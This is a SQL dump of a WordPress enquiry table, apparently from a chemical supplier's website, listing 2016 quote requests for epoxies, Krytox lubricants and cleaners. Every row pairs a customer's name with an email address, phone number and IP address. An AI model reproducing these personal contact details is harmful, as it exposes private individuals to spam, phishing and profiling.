INSERT INTO `wp_enquiry_detail_new` VALUES (118, 'Hien Nguyen', 'Hien.Nguyen@DescoIndustries.com', 'I\'m interested in the product, EPON Resin 8021. How can I get a sample for testing it?', '8053047772', 'Price for sample (EPON Resin 8021)', '71.246.60.161', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"970";s:5:"title";s:12:"EPON™ 8021";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-8021.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-28 18:32:17', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (119, 'Tobias Donnell', 'tdonnell4425@mytu.tuskegee.edu', 'Hello,\n\nI am requesting a quote for eight (8) 1-gallon bottles of Epon 862 as well as four (4) 1-gallon containers of Epikure-W. \n\nThank you for your time,\nTobias Donnell', '3347971706', 'Epon 862 and Epikure-W', '192.203.127.3', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"887";s:5:"title";s:11:"EPON™ 862";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-862.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-28 19:11:59', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (120, 'Mitchell Bieniek', 'bieniekm@umich.edu', 'I am interesting in purchasing 1 can of your MS-580N precision cleaning solvent. ', '6306897567', 'University of Michigan Inquiry', '35.2.167.60', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1705";s:5:"title";s:12:"MS-580N/582N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-580N.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-28 19:39:17', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (121, 'Franklin Liou', 'fliou@berkeley.edu', 'Hello,\n\nWe would like a quote for 1 quart of ms-111 stripping agent. Thank you!', '6507965737', '', '128.32.239.213', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:28:"MS-111 Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-31 00:32:19', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (122, 'cedrik kalukuta', 'cedrickk@maind.com', 'I would like to know the price of the MS143TE dry lubricant\nmy phone number is 770- 487-7761  ext. 376 ', '', 'PTFE release Agent', '50.192.56.114', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"303";s:5:"title";s:8:"MS-143TE";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-143TE.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-31 10:41:46', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (123, 'Brent Granger', 'brent.granger@advan6.com', 'Need quote for 4EA Krytox GPL 227', '', 'Quote for Krytox GPL 227', '199.64.7.58', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"852";s:5:"title";s:7:"GPL 227";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_316632911.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-31 15:18:18', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (124, 'Dan Test', 'ddillulio@mschem.com', 'test', '', 'test', '24.63.154.108', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"347";s:5:"title";s:7:"GPL 200";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_153282266.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-31 18:02:11', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (125, 'Zayyan Chowdhury', 'zchowdhury@mschem.com', 'asdytrestestsestse', '', 'asdtest', '24.63.154.108', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1270";s:5:"title";s:13:"HELOXY™ 505";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/HELOXY-505.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-01 15:32:02', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (126, 'Maria', 'mzimmerman@surfaceoptics.com', 'Please quote for minimum quantities of epon 828. We have one project we are working on only, and do not need more than ~250ml', '8586757404', 'epon 828', '70.183.80.218', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-01 20:09:33', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (127, 'Seth Hara', 'hara.seth@mayo.edu', 'Hi, I\'d like a quote for your Epon Resin 828, please!', '5075387286', 'Request for quote', '129.176.151.10', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-01 21:33:45', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (128, 'Amy Goodman', 'agoodman@amifla.com', 'qty 12  of the 14oz cans', '7275733300', 'MS-475C quote', '71.180.29.137', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"621";s:5:"title";s:7:"MS-475C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-475C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-02 15:21:52', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (129, 'Robert Scharf', 'rscharf@harris.com', 'Good Afternoon,\nPlease provide price and availability for 1 gal. and 2 gals. of EPON 828\n\nThanks!\nRobert', '6316304167', 'Request for Quote - EPON 828', '10.246.15.87', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-02 18:53:28', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (189, 'Richard Raymond', 'rraymond@umich.edu', 'I\'m looking for a small amount (preferably a quart or less) of Epon 828 plus a similar amount of 3140.\nThis is for testing gluing of Kapton.  What\'s the smallest you sell, and what are the prices?\nThanks - RR', '(734) 276-1357', 'EPON 828 resin &amp; 3140 curing agent', '141.211.99.145', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-07 19:30:39', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (131, 'Shelia', 'smcentire@cemspro.com', 'Looking to purchase 12 cans of Re-Nu, where do I purchase?  I need price and delivery.', '4796375300', '12 cans of Re-Nu', '75.120.131.82', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1292";s:5:"title";s:15:"Contact Re-Nu®";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/contact-cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-03 19:55:55', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (168, 'Ido Offenbach', 'ido.offenbach@evonik.com', 'Hello \n\nCan you send 5 gallon sample of EPON 828 to Texas State University . The request is for graduate  student in the engineering department.   \n\nBest regards,\nIdo Offenbach', '8042198471', 'sample request ', '12.154.142.126', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-04 19:29:19', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (134, 'shelia', 'smcentire@cemspro.com', 'Just wanted to confirm the differences between Re-Nu and MS-230-CO', '4796375300', 'Re-NU', '75.120.131.82', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1292";s:5:"title";s:15:"Contact Re-Nu®";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/contact-cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-03 20:02:27', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (186, 'Ayman', 'Ayman_alkattan@yahoo.com', 'Dental hand peace lubricant ', '(574) 329-9190', '', '107.72.164.46', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"474";s:5:"title";s:30:"FluoroExtreme Dental Lubricant";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/DENTAL.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-07 02:32:09', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (187, 'Ron Fener', 'Rfenerdds@aol.com', 'I would like to know the price and instructions of use.Thanks', '(718) 842-5020', 'Dental lubricant', '74.89.63.151', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"474";s:5:"title";s:30:"FluoroExtreme Dental Lubricant";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/DENTAL.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-07 03:08:16', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (185, 'Haris', 'hahmed@stira.sa', 'Hello,Kindly send me quotation for the silicone resin as we need it for PCB which will be installed in extreme temperature.', '+966 59 283 7244', 'Quotation Request', '188.48.130.44', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"732";s:5:"title";s:7:"MS-462H";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-462H.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-06 08:46:29', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (190, 'Ritchie', 'rchen627@mit.edu', 'I am interested in a small volume of around 4 oz for the Krytox 157FS. I will be using this for microfluidic emulsions at MIT.', '(617) 253-7141', '', '18.93.15.25', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"960";s:5:"title";s:7:"157 FSL";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:104:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Chemours-Krytox-Group-Oil-Scale-300-dpi.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-07 19:47:11', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (191, 'Michael Gilbert', 'gilbert@eiclabs.com', 'Need price for one gallon of Epikure 3234', '(781) 769-9450', 'Epoxy Curative', '173.162.224.137', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1185";s:5:"title";s:15:"EPIKURE™ 3234";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3234.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-07 21:42:32', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (192, 'Jeff Watchorn', 'jwatchor@uwaterloo.ca', 'Hi,\n\nI am interested in using your epoxy for sealing the glass-glass interface of a microfluidic device. Please provide a quote.', '', 'Epoxy for Glass Microfluidics', '24.246.27.89', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-08 10:48:56', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (177, 'Josh O Caume', 'joshcaume@hotmail.com', 'Hi, \nI\'m contacting you today for pricing and available options of three of your current product offerings:\nKrytox GPL-103 Oil \nKrytox GPL-105 Oil \nKrytox GPL-205 Grease\nI was wondering if you could supply me with a quote to the smallest quantity offering of each individual product (ie 2oz tube). \nI look forward to hearing from you, \nJosh ', '9024997023', 'Krytox Gpl Series Oil and grease', '47.55.125.25', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"789";s:5:"title";s:7:"GPL 205";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_329225291.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-05 14:38:20', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (193, 'DUNG LAM', 'DLAM@PRECIPART.COM', 'Hi,\n\nI need to order the minimum quantities allowed.  Please quote price and delivery for Epon 828 and Harderner Versamid 125.  Thanks.\n\nRegards,\n\nDung Lam\n\n\n', '(631) 694-3100', 'QUOTE &amp; DELIVERY For Epon 828 and Versamid 125', '47.19.63.131', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-08 14:43:38', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (194, 'Raymond Fortin', 'raymond.fortin@soucy-group.com', 'I need a price for a minimum of 250 grams.', '(819) 864-4284', 'Sample', '24.37.167.114', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-08 15:04:22', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (195, 'MIGUEL A ORTIZ', 'QUALITY@AIRWAYAEROSPACE.COM', 'ASKING FOR PRICE ', '(786) 597-7286', 'PRICE', '65.15.15.93', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1670";s:5:"title";s:7:"MS-381H";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/connector-lubricant-2.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-08 15:48:54', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (196, 'Christine Beavers', 'cmbeavers@lbl.gov', 'Hello, \n   need a quote for one bottle of MS-111. \n\nCheers, \nChristine', '', 'Request for Quote', '131.243.191.172', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:28:"MS-111 Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-08 17:23:37', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (197, 'SH', 'shaggert@nait.ca', 'Hi there.  I\'d like a price quote for a case of safezone cleaner.  I\'m looking to purchase 24 cans. \n Also, what would it cost to ship to Edmonton, Alberta?  Thank you!', '(780) 471-7724', 'Price quote', '192.197.128.19', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-08 17:37:20', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (198, 'Amal Hammoud', 'acct@endocorpusa.com', 'Hello,  I need a quote for 10 of GPL 205 for my company EndocorpUSA', '(248) 223-9900', 'Pricing', '173.167.26.113', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"789";s:5:"title";s:7:"GPL 205";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_329225291.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-08 18:52:24', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (199, 'Diane Adamson', 'diane.adamson@ngc.com', 'I\'m looking for pricing on five 55 gallon drums of this material.  Need immediate pricing please.', '(408) 735-3217', 'Price and delivery', '134.223.116.158', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-08 20:18:42', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (200, 'Shirley Sawyer', 'ssawyer@americh.com', 'I would like to know the price and the qty. you have to order. ', '(704) 588-3075', 'Price', '12.207.168.162', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-09 15:38:38', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (201, 'Ellie Boedeker', 'eboedeke@harris.com', 'Could I get the price, availability and minimum buy quantity on MS-122AD', '(719) 599-1869', 'Price', '10.34.169.59', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-09 18:59:24', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (202, 'Frances Benton', 'fbenton@markem-imaje.com', 'Good day,\nI am interested in purchasing some of your MS-153BN mold release.  Could you please send volumes and pricing?\nKind Regards,\nFrances Benton', '(603) 283-2847', 'High Temp Mold Release ', '64.222.98.26', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"308";s:5:"title";s:8:"MS-153BN";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Boron-nitride.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-09 21:58:58', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (203, 'Frances Benton', 'fbenton@markem-imaje.com', 'Good Day,\nI am interested in purchasing some of your PTFE mold release spray, MS-122AD.  Could you please send me information on volumes and pricing.\n', '(603) 283-2847', 'PTFE Mold Release', '64.222.98.26', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-09 22:01:31', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (204, 'mike duveers', 'mikeduveers@yahoo.com', 'I have several corrugating plants as customers for various industrial products. I am thinking of offering  Krytox grease as several maintenance guys have asked. Can you advise pricing for both tubes and pails, minimum quantities, lead times, etc. for both your 226FG and 227FG and perhaps guide me as to which is more popular in the corrugating industry, main differences, etc.? \n\nThank you.', '', 'Pricing for Corrugating Krytox 226FG &amp; 227FG', '69.131.147.12', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"2741";s:5:"title";s:24:"226 FG Corrugator Grease";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_353441450.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-10 15:07:49', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (205, 'Debi Porter', 'dlporter@bwxt.com', 'I\'m inquiring as to what a case of 12 of this product would cost?', '(434) 522-5169', 'MS-260 - Foam galls cleanre', '199.246.255.164', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-10 19:32:26', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (206, 'Daniel Bouch', 'daniel.bouch@navy.mil', 'Please quote the cost for 5 ea. 1-Qt. bottles', '', 'Quote request', '138.162.0.43', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-10 19:52:31', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (207, 'David', 'david.ferguson@siltech.com', 'Requesting some more literature for Sion solvent. We may have potential use for this as a cleaning agent. \n\nI was looking to inquire for further technical literature, pricing, and sample availability.', '(905) 270-5534', 'Opteon Sion', '216.223.142.233', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1287";s:5:"title";s:4:"Sion";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/opteon-sion.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-12 16:42:25', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (208, 'dean neva', 'dneva@sbcglobal.net', 'price and delivery', '(406) 361-8274', 'ms260 cleaner', '69.144.156.191', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-13 17:12:53', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (209, 'Stefan Haingärtner', 'stefan_haingaertner@t-online.de', 'Dear sir or madam,\n\nI\'m writing because I\'m interested in purchasing a single 2 oz(or 4 oz) Needle Nose Bottle of Krytox GPL 103 oil and a 2 oz (or 4 oz) tube of Krytox GPL 206 grease. However, I am located in Germany.\nDo you ship internationally? I\'ve already been in contact with Costenoble (authorized Krytox distributor in Germany), but they don\'t sell single tubes in the sizes I need.\n\nThank you very much in advance.\n\nBest regards\nStefan Haingärtner', '', 'Inquiry for Krytox GPL 103/206', '93.221.209.187', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"438";s:5:"title";s:7:"GPL 103";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease3.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-13 18:34:15', '', NULL, '', '', '', NULL, '', ''); 
